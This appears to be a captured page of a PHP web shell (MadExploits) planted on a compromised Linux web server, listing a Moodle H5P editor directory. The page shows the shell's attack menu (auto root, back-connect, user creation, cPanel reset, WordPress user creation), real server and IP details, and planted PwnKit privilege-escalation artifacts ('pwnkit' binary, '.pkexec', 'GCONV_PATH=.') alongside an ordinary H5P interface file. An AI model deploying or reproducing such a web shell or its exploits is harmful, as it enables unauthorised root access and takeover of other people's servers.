Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.100.62
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
editor /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.gitignore
54
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
README.md
168
B
-rw-r--r--
composer.json
928
B
-rw-r--r--
h5peditor-ajax.class.php
14.92
KB
-rw-r--r--
h5peditor-ajax.interface.php
1.38
KB
-rw-r--r--
h5peditor-file.class.php
6.08
KB
-rw-r--r--
h5peditor-storage.interface.ph...
3.05
KB
-rw-r--r--
h5peditor.class.php
26.92
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : h5peditor-ajax.interface.php
<?php /** * Handles Ajax functionality that must be implemented separately for each of the * H5P plugins */ interface H5PEditorAjaxInterface { /** * Gets latest library versions that exists locally * * @return array Latest version of all local libraries */ public function getLatestLibraryVersions(); /** * Get locally stored Content Type Cache. If machine name is provided * it will only get the given content type from the cache * * @param $machineName * * @return array|object|null Returns results from querying the database */ public function getContentTypeCache($machineName = NULL); /** * Gets recently used libraries for the current author * * @return array machine names. The first element in the array is the * most recently used. */ public function getAuthorsRecentlyUsedLibraries(); /** * Checks if the provided token is valid for this endpoint * * @param string $token The token that will be validated for. * * @return bool True if successful validation */ public function validateEditorToken($token); /** * Get translations for a language for a list of libraries * * @param array $libraries An array of libraries, in the form "<machineName> <majorVersion>.<minorVersion> * @param string $language_code * @return array */ public function getTranslations($libraries, $language_code); }
Close